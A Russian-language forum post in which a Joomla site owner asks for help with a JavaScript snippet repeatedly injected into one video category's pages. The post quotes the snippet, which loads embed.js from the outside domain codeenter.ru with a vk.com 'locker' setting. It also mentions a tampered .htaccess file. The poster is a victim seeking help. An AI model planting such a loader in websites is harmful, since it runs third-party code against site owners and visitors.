Добрый день друзья! С огромным уважением обращаюсь к вам за помощью и разъяснениями. Пишу на этом форуме впервые, поэтому не обессудьте, если что не так. У меня есть сайт (ему 5 месяцев), полностью предназначенный для просмотра видео в режиме онлайн, сделанный на движке Joomla 1.5.25 На нем 18 категорий. Вчера, зайдя в категорию "Скрытая камера" при открытии любой страницы с выбранным роликом антивирус начал ругаться. Сначала не вкурил что за фигня, но открыв HTML страницу в браузере увидел, что в каждой станице после тега <H1> стоит вот такая неприятность (короче говоря, побывала на сайте какая-то бяка без моего ведома):
<script type="text/javascript">
var ecConfig = ecConfig || [];
ecConfig['sid']='3739';
ecConfig['domain']='codeenter.ru';
ecConfig['locker']='vk.com/video_ext.php';
ecConfig['time']='30';
ecConfig['theme']='vk';
(function (){
var ecs = document.createElement('script'); ecs.type = 'text/javascript'; ecs.async = true;
ecs.src = ' + ecConfig['domain'] + '/embed.js';
var s = document.getElementsByTagName('script')[0]; s.parentNode.insertBefore(ecs, s);
})();
</script>
Файл в корне сайта .htaccess смотрю тоже изменен и напичкан различными непонятными командами. Хотел посмотреть что за такой сайт в скрипте указан (codeenter.ru), так тут же антивирус ESET раскричался. Удалил полностью весь сайт на серваке и закачал свою чистую новую последнюю резервную копию. Везде сменил пароли и дня 4 все было хорошо, потом опять в этой же категории во всех статьях появилась эта бяка. Страницы с другими роликами и категориями остались не тронуты. В этом куске скрипта вижу, что речь затрагивается о vk.com, наверно потому, что все ролики в Скрытой камере просматриваются через плееры vk.com. В остальных категориях плееров от vk.com очень мало. Уважаемые ребята, будьте добры объяснить, что выполняет этот скрипт? И что это за время в 30? Как избавиться от него. И где происходит вызов на действия этого скрипта.
Подозрение, что какой-то парсер что-ли или кто-то попытается таким образом трансляцию видео производить через сайт. И кажется что это бяка повязана с редактором на сайте. На сайте стоит TinyMCE. Вполне меня устраивает, другого нету. С чего начать чтобы избавиться от этой беды? По трафику сильно бьет. Сайт свой не указываю в этом посте, только потому, что не хочу, чтобы многие посчитали, что я рекламирую свой ресурс. Хотя в данной проблеме, его указывать и не обязательно. Уважаемые друзья, спасибо Вам огромное за внимание. очень жду ваших ответов и мыслей по данному скрипту. Желаю всем удачи и крепкого здоровья всем вашим близким и родным!